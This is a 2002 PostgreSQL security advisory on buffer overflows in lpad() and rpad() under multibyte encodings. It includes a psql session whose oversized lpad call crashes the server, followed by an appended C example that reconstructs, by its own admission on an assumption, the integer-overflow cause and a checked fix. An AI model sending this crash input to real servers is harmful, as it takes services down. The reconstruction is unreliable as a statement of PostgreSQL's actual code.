//@(#) Mordred Labs advisory 0x0004

Release date: 20/08/02
Name: Two buffer overflows in PostgreSQL
Versions affected: all versions
Conditions: multibyte support
Risk: average

--[ Description:

I guess all of you have already heard about PostgreSQL. If not, visit
http://www.postgresql.org/idocs/index.php?preface.html#INTRO-WHATIS.

There are two buffer overflows in src/backend/utils/adt/oracle_compat.c:

1) lpad(text, integer, text) function
2) rpad(text, integer, text) function

--[ Details:

The code for these functions is src/backend/utils/adt/oracle_compat.c::lpad()
and src/backend/utils/adt/oracle_compat.c::rpad() respectively. The code
suffers from a buffer overflow (of course).

--[ How to reproduce:

shell> pgsql template1 postgres
template1=# select version();
                          version
-----------------------------------------------------------
 PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)

template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# \c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
        This probably means the backend terminated abnormally
        before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#

The same for the rpad() function.

The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
MULE_INTERNAL.

--[ Solution

Secure coding of web applications, input validation checks... etc...
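The advisory does not say why the multibyte build is the one that crashes. The added example below is my own code, not PostgreSQL's, and it rests on an assumption: that the padded result size is computed as "requested length times maximum bytes per character" in a 32-bit int before allocation. With an assumed 3 bytes per character, the advisory's value 1431655765 multiplies to exactly 2^32-1, so adding the 4-byte varlena header wraps the size to 3 bytes while the pad loop still writes 1431655765 characters. The checked variant shows the overflow test a fix would need.

```c
#include <stdint.h>
#include <limits.h>
#include <stdio.h>

#define VARHDRSZ 4  /* size of the varlena length header */

/* Unchecked size computation (my reconstruction of the assumed bug, not
 * PostgreSQL's code). Done in uint32_t so the wraparound is defined here;
 * signed overflow in the real code would be undefined behaviour. */
int32_t pad_bytes_unchecked(int32_t len, int max_char_len)
{
    uint32_t bytelen = (uint32_t)len * (uint32_t)max_char_len;
    return (int32_t)(VARHDRSZ + bytelen);   /* wraps for large len */
}

/* Checked variant: returns the byte size, or -1 if len * max_char_len
 * plus the header cannot be represented in an int32. Negative len is
 * taken as zero, matching the documented lpad/rpad behaviour. */
int32_t pad_bytes_checked(int32_t len, int max_char_len)
{
    if (len < 0)
        len = 0;
    if (max_char_len <= 0)
        return -1;
    /* Test before multiplying: len * max_char_len + VARHDRSZ <= INT32_MAX */
    if (len > (INT32_MAX - VARHDRSZ) / max_char_len)
        return -1;
    return VARHDRSZ + len * max_char_len;
}

int main(void)
{
    int32_t len = 1431655765;   /* the value from the advisory */
    int max_char_len = 3;       /* assumed bytes per character for UNICODE */

    /* prints 3: header + 0xFFFFFFFF wraps to a 3-byte allocation */
    printf("unchecked: %d\n", pad_bytes_unchecked(len, max_char_len));
    /* prints -1: the request is rejected instead of under-allocating */
    printf("checked:   %d\n", pad_bytes_checked(len, max_char_len));
    return 0;
}
```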